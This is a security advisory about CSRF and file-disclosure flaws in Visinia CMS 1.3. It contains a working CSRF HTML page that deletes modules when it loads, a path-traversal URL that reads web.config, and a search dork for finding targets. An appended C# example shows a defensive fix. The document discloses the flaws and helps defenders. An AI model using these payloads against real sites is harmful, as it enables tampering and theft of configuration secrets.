Day 3 (0day)

Abysssec Inc Public Advisory

Title            : Visinia Multiple Vulnerabilities
Affected Version : Visinia 1.3
Discovery        : www.abysssec.com
Vendor           : http://www.visinia.com/
Download Links   : http://visinia.codeplex.com/releases
Dork             : "Powered by visinia"
Admin Page       : http://Example.com/Login.aspx

Description :
===========================================================================================
This version of Visinia has multiple vulnerabilities:

  1- CSRF for Remove Modules
  2- LFI to download web.config or any file

CSRF for Remove Modules:
===========================================================================================
With this vulnerability, an administrator who is already logged in and is led to visit a
malicious site will remove a module through a POST request sent to the server.

A request to this path removes the module:

http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159

To remove other modules, just change ModuleId.

The source of the HTML page (malicious script) is here:
----------------------------------------------------------------------------------------
<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Modules in Visinia CMS.

<script>
function RemoveModule() {
    try {
        netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
    } catch (e) {}

    var http = false;
    if (window.XMLHttpRequest) {
        http = new XMLHttpRequest();
    }
    else if (window.ActiveXObject) {
        http = new ActiveXObject("Microsoft.XMLHTTP");
    }

    url = "http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159";
    http.onreadystatechange = done;
    http.open('POST', url, true);
    http.send(null);
}
function done() {
    if (http.readyState == 4 && http.status == 200)
    {
    }
}
</script>
</head>
<body onload ="RemoveModule();">
</body>
</html>
----------------------------------------------------------------------------------------

File Disclosure Vulnerability:
===========================================================================================
Using this path you can download the web.config file from the server:

http://Example.com/image.axd?picture=viNews/../../web.config

The downloaded file is named image.axd, but after downloading you find that its content
is web.config.

The vulnerable code is in the DLL visinia.SmartEngine.dll, in the method
ProcessRequest(HttpContext context):
--------------------------------------------------------------------
public void ProcessRequest(HttpContext context)
{
    if (!string.IsNullOrEmpty(context.Request.QueryString["picture"]))
    {
        string fileName = context.Request.QueryString["picture"];   // File name taken directly from the URL
        string folder = WebRoots.GetResourcesRoot();
        try
        {
            FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName);
            int index = fileName.LastIndexOf(".") + 1;
            string extension = fileName.Substring(index).ToLower();
            if (string.Compare(extension, "jpg") == 0)
            {
                context.Response.ContentType = "image/jpeg";
            }
            else
            {
                context.Response.ContentType = "image/" + extension;
            }
            context.Response.TransmitFile(fi.FullName);   // File is written to the response for download without any check
        }
        catch
        {
        }
    }
}
--------------------------------------------------------------------

===========================================================================================

Feel free to contact me: shahin [at] abysssec.com
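The check that ProcessRequest is missing, as an added example that is not part of the original advisory or of Visinia's code: canonicalize the requested name and serve it only if it stays inside the resources folder and has an image extension. SafeImageResolver, the extension list and the sample root folder are assumptions made for the illustration; resourcesRoot stands in for context.Server.MapPath(folder).

```csharp
using System;
using System.Collections.Generic;
using System.IO;

// Added example: containment check for the "picture" parameter.
// SafeImageResolver and its members are hypothetical names, not Visinia code.
public static class SafeImageResolver
{
    // Only the image types the handler is meant to serve (assumed list).
    static readonly HashSet<string> Allowed = new HashSet<string>(
        StringComparer.OrdinalIgnoreCase) { ".jpg", ".jpeg", ".png", ".gif" };

    // Returns the canonical path if it is an allowed image inside resourcesRoot,
    // otherwise null. resourcesRoot stands in for Server.MapPath(folder).
    public static string Resolve(string resourcesRoot, string picture)
    {
        if (string.IsNullOrEmpty(picture)) return null;

        // Root with exactly one trailing separator, so "Resources" cannot
        // prefix-match a sibling folder such as "ResourcesOld".
        string root = Path.GetFullPath(resourcesRoot)
            .TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
            + Path.DirectorySeparatorChar;

        string full;
        try
        {
            // Canonicalize: collapses ".." segments, and also exposes rooted
            // inputs, which Path.Combine returns unchanged.
            full = Path.GetFullPath(Path.Combine(root, picture));
        }
        catch (Exception) { return null; }   // malformed path

        // Case-insensitive comparison to match Windows file systems.
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;
        if (!Allowed.Contains(Path.GetExtension(full))) return null;
        return full;
    }

    public static void Main()
    {
        string root = Path.Combine(Path.GetTempPath(), "site", "Resources"); // constructed
        string[] samples = { "viNews/logo.jpg", "viNews/../logo.png",
                             "viNews/notes.txt", "viNews/../../web.config" };
        foreach (string s in samples)
            Console.WriteLine("{0,-28} -> {1}", s, Resolve(root, s) ?? "REJECTED");
    }
}
```

In the handler, a null result would end the request with a 404 before TransmitFile is reached, and the content type would be chosen from the allowed extension rather than built from the raw query string.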